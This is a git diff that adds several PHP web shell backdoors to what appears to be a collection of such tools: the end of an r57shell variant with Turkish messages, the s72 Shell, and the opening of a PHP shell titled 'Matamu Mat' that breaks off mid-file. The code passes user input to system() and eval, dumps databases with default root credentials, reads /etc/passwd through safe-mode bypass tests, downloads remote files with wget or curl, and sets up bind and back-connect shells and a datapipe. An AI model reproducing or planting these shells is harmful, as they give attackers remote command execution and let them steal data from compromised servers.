+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-]HATA! MysQl Server ile baglanti Kurulamiyor";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mysql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] HATA! Database ile baglanti kurulamiyor";
+   @mssql_close($db);
+  }
+  else echo "[-] HATA! MssQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-]HATA! PostgreSQL  Server ile baglanti Kurulamiyor";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] HATA! Dump dosyalari yazilabilir degil"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
+
diff --git a/138shell/S/s72 Shell v1.1 Coding.txt b/138shell/S/s72 Shell v1.1 Coding.txt
new file mode 100644
index 0000000..fdcc41a
--- /dev/null
+++ b/138shell/S/s72 Shell v1.1 Coding.txt	
@@ -0,0 +1,141 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
+<meta name="Microsoft Theme" content="refined 011">
+</head>
+
+<body background="refbgd2.gif" bgcolor="#000000" text="#FFFFFF" link="#666699" vlink="#999999" alink="#999900">
+
+<!--mstheme--><font face="Times New Roman">
+
+<p><font face="Comic Sans MS" color="#FF0000"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b>s72 Shell v1.1 Coding by <a href="mailto:crazy_king@turkusev.net">
+<font color="#00FF00">Cr@zy_King&nbsp; </font>
+</a> </font></p>
+
+      <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+      <font color="#FF0000"><b><font face="Comic Sans MS" size="1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ 
+      Server Bilgileri ]</td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      </font></b></font>
+</p>
+      <p align="center">
+        <font color="#800080"><b><font face="Verdana" style="font-size: 8pt">
+        Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><font color="#800080"><b>:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell Dizini:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        &nbsp;</font></font><p align="center"><form method="post">
+<p align="center">
+<font color="#800080">
+<br>
+</font><font face="Verdana" style="font-size: 8pt" color="#800080">Buraya 
+Kodunuzu Yazın :)</font><font color="#111111"><br>
+<br>
+</font>
+<font color="#FF0000">
+<textarea size="70" name="command" rows="2" cols="43" ></textarea> <br>
+<br><input type="submit" value="Çalıştır!"></font><font color="#FF0000"><br>
+&nbsp;<br></font></p>
+      </form>
+      <p align="center">
+        <font color="#FF0000">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea></font><p align="center">
+        &nbsp;<p align="center">
+              <font color="#FF0000">
+              <td width="49%" height="24" bgcolor="#FCFEBA">
+              </font>
+      <p align="center"><font color="#FF0000"><b>
+      <font face="Comic Sans MS" size="1">[ Diziler -_- Dizinler ]</td>
+      <td width="51%" height="24" bgcolor="#FCFEBA">
+      </font></b></font>
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        <b><font face="Comic Sans MS" size="1" color="#FF0000">[ Upload ]</font></b></font><font face="Comic Sans MS" size="1"><b><font color="#FF0000"></td></font></b></font><form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya Upload Edebilirsiniz.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Yükle!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>Dosya Zaten Bulunuyor</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>Dosya Başarılı Bir Şekilde Yüklendi</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>Dosya Bulunamadı</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+        <font color="#111111">
+        <br>
+        <br>
+        <br /><br /> </font>
+              <?php 
+// Check for Safe Mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>Güvenlik Açık</b></font>';
+} else {
+   print '<font color=#008000><b>Güvenlik Kapalı</b></font>';
+}
+
+?>
+
+        <!--mstheme--></font>
+
+        </body>
+
+</html>
\ No newline at end of file
diff --git a/138shell/S/shell.php.txt b/138shell/S/shell.php.txt
new file mode 100644
index 0000000..ef13ce8
--- /dev/null
+++ b/138shell/S/shell.php.txt
@@ -0,0 +1,146 @@
+<?php
+
+define('PHPSHELL_VERSION', '1.7');
+
+?>
+
+<html>
+<head>
+<title> Matamu Mat </title>
+</head>
+<body>
+<hr><br>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
